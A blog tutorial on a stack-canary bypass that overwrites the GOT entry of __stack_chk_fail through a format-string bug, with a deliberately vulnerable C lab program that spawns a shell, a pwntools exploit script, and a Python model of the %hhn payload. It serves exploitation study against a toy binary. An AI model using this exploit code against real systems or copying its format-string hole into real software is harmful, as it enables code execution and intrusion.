Canary--劫持__stack_chk_fail函数

Chiu

When the stack canary check at the end of a function fails, gcc's epilogue calls `__stack_chk_fail`. That call goes through the PLT and the GOT, so if the GOT is writable (no Full RELRO, which `-Wl,-z,lazy` guarantees here) and the binary has fixed addresses (`-no-pie`), any arbitrary-write primitive such as a format-string bug can replace the GOT entry of `__stack_chk_fail` with the address of a backdoor function. Deliberately smashing the canary is then the trigger: the check fails, the program "reports" it by calling through the hijacked GOT entry, and the backdoor runs instead. The ordering is what makes this work in the program below: the format string is evaluated inside `printf` before `vuln` returns, so the GOT entry is already overwritten by the time the canary check runs.

Example program:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

// Target of the GOT hijack: nothing in the program calls it directly.
void backdoor() {
    puts("this is a backdoor.");
    system("/bin/sh");
}

void vuln() {
    char buf[0x100];
    puts("please input:");
    // Reads 0x10 bytes past the end of buf, enough to reach the canary
    // that sits between buf and the saved rbp / return address.
    read(0, buf, 0x110);
    // Format-string bug: the attacker-controlled buffer is the format.
    printf(buf);
    // On return the canary check runs; if the canary changed it calls
    // __stack_chk_fail through the GOT.
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    vuln();

    return 0;
}

// gcc pwn.c -o pwn -no-pie -Wl,-z,lazy -g
// -no-pie: fixed addresses for backdoor and the GOT. -Wl,-z,lazy: no BIND_NOW,
// so the GOT stays writable (no Full RELRO). The canary relies on the compiler's
// default stack protector; add -fstack-protector-all if your gcc does not enable it.

exp:

from pwn import *

elf = ELF("./pwn")
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
p = process([elf.path])

# fmtstr_payload(offset, {write_address: write_value})
# offset 6: the first stack-resident printf argument on x86-64, which in vuln()
# is the start of buf itself. Overwrite the GOT entry of __stack_chk_fail
# with the address of backdoor.
payload = fmtstr_payload(6, {elf.got['__stack_chk_fail']: elf.sym['backdoor']})
# Pad up to the canary (buf + 0x108 in this build) and clobber its low byte,
# so the check fails and __stack_chk_fail -> backdoor is called.
# Python 3 pwntools returns bytes, so the padding must be bytes too.
payload = payload.ljust(0x108, b'a')
payload += b'b'
# gdb.attach(p, "b *0x40124b\nc")  # break at the printf call and continue, to check the format-string offset
# pause()

p.sendafter("please input:", payload)

p.interactive()
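What `fmtstr_payload` builds for the write above, as an added example that is not part of the original post: a minimal reimplementation of the byte-wise `%hhn` write in the same layout pwntools uses (directives first, target addresses last because they contain NUL bytes), plus a small model of printf's `%Nc` / `%k$hhn` semantics so the payload can be checked offline. The GOT slot address (0x404018) and backdoor address (0x401196) are constructed placeholders, not the page's binary; the real ones come from `elf.got['__stack_chk_fail']` and `elf.sym['backdoor']`.

```python
import re
import struct

# Constructed placeholder addresses for this example; for the real binary take them
# from elf.got['__stack_chk_fail'] and elf.sym['backdoor'] as the exploit above does.
GOT_STACK_CHK_FAIL = 0x404018
BACKDOOR = 0x401196
# printf's first stack-resident argument on x86-64 is argument 6 (rdi holds the
# format, rsi..r9 hold arguments 1-5); in vuln() that slot is the start of buf.
FMT_OFFSET = 6


def build_fmt_write(offset, target, value, numbwritten=0):
    """Format string that writes the 8-byte little-endian `value` to `target`
    one byte at a time, the way fmtstr_payload(offset, {target: value}) does.

    Layout: [directives, NUL-padded to a multiple of 8][8 target addresses].
    The addresses go last because they contain 0x00 bytes and printf stops
    reading the format at the first NUL.
    """
    wanted = struct.pack('<Q', value)
    # The directives' length fixes which argument slots hold the addresses, and
    # the slot numbers fix the directives' length: grow the directive area one
    # qword at a time until everything fits.
    for fmt_qwords in range(1, 32):
        count = numbwritten
        fmt = ''
        for i, byte in enumerate(wanted):
            # %hhn stores count & 0xff, so only the value modulo 256 matters.
            delta = (byte - count) % 256
            if delta == 0:
                delta = 256            # %c prints at least one character
            slot = offset + fmt_qwords + i
            fmt += '%{}c%{}$hhn'.format(delta, slot)
            count += delta
        if len(fmt) <= fmt_qwords * 8:
            payload = fmt.encode().ljust(fmt_qwords * 8, b'\x00')
            payload += b''.join(struct.pack('<Q', target + i) for i in range(8))
            return payload
    raise ValueError('directives do not fit in 31 qwords')


_DIRECTIVE = re.compile(rb'%(\d+)c|%(\d+)\$hhn')


def simulate_printf(payload, offset):
    """Model just enough of printf to check a payload: %Nc adds N to the count
    of characters printed, %k$hhn stores the low byte of that count at the
    address in argument slot k, and slot `offset` is the first 8 bytes of the
    payload. Returns the memory written as {address: byte}.
    """
    fmt = payload.split(b'\x00', 1)[0]      # printf reads the format up to the NUL
    memory = {}
    count = 0
    for m in _DIRECTIVE.finditer(fmt):
        if m.group(1) is not None:
            count += max(1, int(m.group(1)))
        else:
            slot = int(m.group(2)) - offset
            addr = struct.unpack_from('<Q', payload, slot * 8)[0]
            memory[addr] = count & 0xff
    return memory


def read_qword(memory, addr):
    """Reassemble the 8 bytes the simulation wrote at `addr` (unwritten bytes read as 0)."""
    return struct.unpack('<Q', bytes(memory.get(addr + i, 0) for i in range(8)))[0]


if __name__ == '__main__':
    payload = build_fmt_write(FMT_OFFSET, GOT_STACK_CHK_FAIL, BACKDOOR)
    written = read_qword(simulate_printf(payload, FMT_OFFSET), GOT_STACK_CHK_FAIL)
    print(len(payload), payload.split(b'\x00', 1)[0], hex(written))
```

For these placeholder addresses the payload is 160 bytes, well under the 0x108 bytes that separate buf from the canary, so the padding and the canary-clobbering byte still land where the exploit expects them. The real printf also consumes one argument per `%c`, which is harmless here; pwntools additionally merges and reorders writes, so its output is shorter but works the same way.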
  • Title: Canary--劫持__stack_chk_fail函数
  • Author: Chiu
  • Created at : 2024-07-31 13:55:19
  • Updated at : 2024-07-31 13:56:00
  • Link: https://github.com/Idealist17/github.io/2024/07/31/Canary-劫持-stack-chk-fail函数/
  • License: This work is licensed under CC BY-NC-SA 4.0.